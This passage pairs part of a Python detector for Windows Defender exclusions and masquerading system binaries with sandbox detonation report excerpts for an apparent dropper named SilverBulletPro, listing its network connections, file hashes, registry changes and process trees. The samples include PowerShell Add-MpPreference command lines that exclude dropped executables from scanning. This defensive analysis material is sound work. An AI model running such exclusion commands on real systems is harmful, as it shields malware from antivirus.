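# The only legitimate homes for those names; anywhere else is masquerading.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Directories a standard user can write to; an exclusion here shields a dropper.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\programdata\\", "\\users\\public\\", "\\temp\\")

EXCLUSION_FLAG = re.compile(r"^-Exclusion(Path|Process|Extension)$", re.IGNORECASE)
# Whitespace split that keeps "double" and 'single' quoted arguments intact.
TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line, returning tokens without surrounding quotes."""
    out = []
    for tok in TOKEN.findall(cmdline):
        if len(tok) >= 2 and tok[0] in "\"'" and tok[-1] == tok[0]:
            tok = tok[1:-1]
        out.append(tok)
    return out


def is_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE_MARKERS)


def is_masquerading(image: str) -> bool:
    """True when the image has a core Windows process name but is not under System32/SysWOW64."""
    low = image.lower()
    return ntpath.basename(low) in SYSTEM_BINARY_NAMES and not low.startswith(SYSTEM_DIRS)


def inspect_event(image: str, cmdline: str) -> list[Finding]:
    """Return every finding for one process-creation record."""
    findings = []
    if is_masquerading(image):
        findings.append(Finding("masquerading_system_binary", image, image))
    tokens = tokenize(cmdline)
    if "add-mppreference" not in (t.lower() for t in tokens):
        return findings
    for i in range(len(tokens) - 1):
        flag = EXCLUSION_FLAG.match(tokens[i])
        if not flag:
            continue
        kind, value = flag.group(1).lower(), tokens[i + 1]
        if kind == "path" and is_user_writable(value):
            reason = "path exclusion inside a user-writable directory"
        elif kind == "process" and value.lower() in SYSTEM_BINARY_NAMES:
            reason = "process exclusion by name also covers look-alike binaries outside System32"
        elif kind == "extension":
            reason = "blanket extension exclusion"
        else:
            reason = "Defender exclusion added from the command line"
        findings.append(Finding(f"defender_exclusion_{kind}", image, f"{value}: {reason}"))
    return findings


def scan(events: list[tuple[str, str]]) -> list[Finding]:
    return [f for image, cmdline in events for f in inspect_event(image, cmdline)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed records: (image path, command line), taken from the Processes list above.
EVENTS = [
    (r"C:\Users\Admin\AppData\Roaming\svchost.exe", r'"C:\Users\Admin\AppData\Roaming\svchost.exe"'),
    (r"C:\ProgramData\csrss.exe", r'"C:\ProgramData\csrss.exe"'),
    (PS, r'powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe" -Force'),
    (PS, f'"{PS}" Add-MpPreference -ExclusionExtension ".tmp" -Force'),
    (PS, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath ' r"'C:\Users\Admin\AppData\Roaming\svchost.exe'"),
    (PS, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' "'csrss.exe'"),
    # Benign control: the real service host, which must not fire.
    (r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(f"[{finding.rule}] {finding.image}\n    {finding.detail}")
```

On a live host the same questions can be answered after the fact with `Get-MpPreference` (its ExclusionPath, ExclusionProcess and ExclusionExtension properties), which is the first thing to pull when a sandbox report like this one shows Add-MpPreference in the process tree: the exclusions outlive the dropper and keep protecting whatever it left behind.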
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
Files
memory/4916-0-0x00007FF835F73000-0x00007FF835F75000-memory.dmp
memory/4916-1-0x0000000000FE0000-0x0000000001328000-memory.dmp
memory/4916-4-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe
| MD5 | 6d535debd23786b26bf8569d912a00fe |
| SHA1 | bcddcbd663f1fa166df4d4517c7fd609d96a4f6d |
| SHA256 | e9e776072b437af8866e6771217cebae30a50128fc930f5917b722149efd5b57 |
| SHA512 | 38591fc556bfe7132aacbf9954dbb7c8a39ef364a015ccdc9618f3446555627d4ee57b33d07b77924afc0447c0135c3a93bbc7dc9b7dbad6ef5f286e50cbbd1b |
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | 7c1243aac3248ae75cc2bab7bf4dfaba |
| SHA1 | 3dd055ef06380e5886f59b76761132c36e8b3e8f |
| SHA256 | dbf81c18b8fa71de185da60a70e41f5799405e5a8331e759b399cab5353a1eda |
| SHA512 | 3f643f2ec6ca210247eab13abfb2e7e73e0f8621e137c9c1fedc3390fbd5129d78dba438988fa6cf70800def4f60cc2a320e8f269b2bfeaa63bade64c5a2bcbf |
C:\ProgramData\csrss.exe
| MD5 | 4d250bcbc14b9b2076b4c651ee3b7deb |
| SHA1 | f5cd7173e1797f085b2da82cfa3729e0144bc16b |
| SHA256 | 41a2f2ca1bdf22fcef635dba5bfd267d32c432aa2f9f00c1574465712d7a5260 |
| SHA512 | 3c3ef5bf7ce6490864256c779493275710645b8cd6087e982b9f49cf1b76f35d1f38799e2641ba5bad00d616aac1eead7b922630795eb88d4a398964365007a2 |
memory/3144-40-0x00000000007F0000-0x000000000080A000-memory.dmp
memory/4612-44-0x0000000000C40000-0x0000000000C4E000-memory.dmp
memory/3144-43-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4916-45-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4452-39-0x0000000140000000-0x000000014012A000-memory.dmp
memory/2548-54-0x000001CA0B120000-0x000001CA0B142000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1aalmx1b.ndu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9866ce9132fde43e7017b55c6659b01c |
| SHA1 | ab6f0545b461ca5f760b32b55e6d418bde79ea18 |
| SHA256 | 316dbb5cd7968c305a006acfdf185b011bd484209fcad4f8d2df68f6c28b9803 |
| SHA512 | 22da2931c6a3cdda0aa5f309516944687cab319633a004e8f00d49ff0e9f2df7c1b5823ce0c90bf307e1649cfd65a658ce7b954861c435b75dce4486b4a94497 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro091.tmp
| MD5 | 8fd1d495b09695f4fb95638213559464 |
| SHA1 | 8525bec9fcc14bfb53145f339b5498c7d5948563 |
| SHA256 | 21e178a283f66f767540ca84c2f2fe46bfe18add60a41f49a65ac4bdaae1f7a2 |
| SHA512 | 80239f149715fccd6e0d615ace999b483315ec9451664352aea5953a321435964757721e5694e4dfbb3b8aab001621112332617b99eb95994d616160838a82a4 |
memory/4452-76-0x0000000003680000-0x0000000003CC1000-memory.dmp
memory/4452-70-0x0000000003680000-0x0000000003CC1000-memory.dmp
memory/2908-79-0x0000000000110000-0x0000000000111000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro0E5.tmp
| MD5 | 86d23632843c402a3a34828bb99317c9 |
| SHA1 | ee7082dcee56cb61d0cae037078efb2a4b32eaae |
| SHA256 | eef04cd51ee4cffc01ea5b13e1bf7a174cc4f093aef143471a31d16e20f9e280 |
| SHA512 | 9a5fcf3158c96be1a48dff04d58ec15471d69f44a6a06ea5f2fcd2c858bd974bbfbfe31028cc85a321ae55f5d621038c5234dcf01757682c399b91dc007cb223 |
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe
| MD5 | 347d21e54202cc42486f1be0f38ebea1 |
| SHA1 | f3a17fd7d1581928d8bf773c0f99433da64253db |
| SHA256 | 80e06ccb6370aca19137d47b6ecf3256d6a34b67a3d4bf0b7c3190a1c5feacad |
| SHA512 | 620f6318b95253cee873b21b90bdc8f75fb32c30bc42032b9eed5773890a700e66ca3f27f2418bb6b39c8a33f2dea718c2215852e64063e0187131be841950b9 |
memory/2908-134-0x0000000140000000-0x0000000140641000-memory.dmp
memory/2908-135-0x0000000140000000-0x0000000140641000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |
memory/4452-164-0x0000000140000000-0x000000014012A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4ae54c3a00d1d664f74bfd4f70c85332 |
| SHA1 | 67f3ed7aaea35153326c1f907c0334feef08484c |
| SHA256 | 1e56a98f74d4a604bef716b47ef730d88f93aec57a98c89aa4423394cbc95b5c |
| SHA512 | b3bbdefeaadbdaac00f23ce3389bbd3b565bd7e0079aeebf3e4afba892382e1cd3896c00bb2e5a98146ac593f9bdc5568d0bd08c5b0139f0814b1a38911c3889 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dc143fa34e2f4c5e011252da10d89be1 |
| SHA1 | 89f3353c1c756e1a017c254dbdcab2ec0b75f515 |
| SHA256 | c3ccda169e6dc95b0995217db271eefb5aaf6504ccb182b82f10e7dbcf116f99 |
| SHA512 | 2c13a36927189f2d6a78645c038cf043957f678daf9f14dc40d4d05dd5138b77949f9ce9e3e457fadde61f053e1f4669b5691c99047baa10e9b82f50fccb33e6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 04a2f52775d1006aad0d9f9b1a45ca38 |
| SHA1 | d28c9e7990cb6ef0cd58323318ccf015b107db49 |
| SHA256 | 43124b7a03773c09777210c1e8d02c089766c2247dbb357a2bd4f1283b97f959 |
| SHA512 | f2cd6792b54a1da051bce8853f5f9548c220171ded821c37b31270e41649b707cfe9b17d830be0116d09375e2051b5f2e73a25060ca34b2942b18735ce416cd4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 051a74485331f9d9f5014e58ec71566c |
| SHA1 | 4ed0256a84f2e95609a0b4d5c249bca624db8fe4 |
| SHA256 | 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888 |
| SHA512 | 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d |
C:\Users\Admin\AppData\Local\Temp\DB\SilverBulletPro.db
| MD5 | 57a3e1142afed0af19a88368935c6693 |
| SHA1 | ad40f4ff5ad23e39a1b0c1ffc581793bc6d36b04 |
| SHA256 | 31b0f6669e49303bea772658c76cd8557d01840c6b7b51f2eed54c4c0a44d4ff |
| SHA512 | 63de757a4fc7f618dc90f8dfd1d383a61fac55848f886e617534d5add9ab06c231edc2ff87b07270cf2b30830c7a7c1fb66d4da6ee2b9f348903cb4dfe412c93 |
memory/3144-242-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
75s
Max time network
93s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Tessernet\liblept1820.dll,#1
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
137s
Max time network
154s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31111900" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "578934335" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2600 wrote to memory of 3616 | N/A | C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE | C:\Program Files\Internet Explorer\iexplore.exe |
| PID 2600 wrote to memory of 3616 | N/A | C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE | C:\Program Files\Internet Explorer\iexplore.exe |
Processes
C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\bin\TesserNet.xml"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\bin\TesserNet.xml
Network
Files
memory/2600-1-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-3-0x00007FFAE55C3000-0x00007FFAE55C4000-memory.dmp
memory/2600-2-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-0-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-5-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-7-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-6-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-4-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-8-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-9-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-10-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-11-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-13-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-12-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-14-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-19-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-18-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-17-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-16-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-15-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
69s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\教程\README.md
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding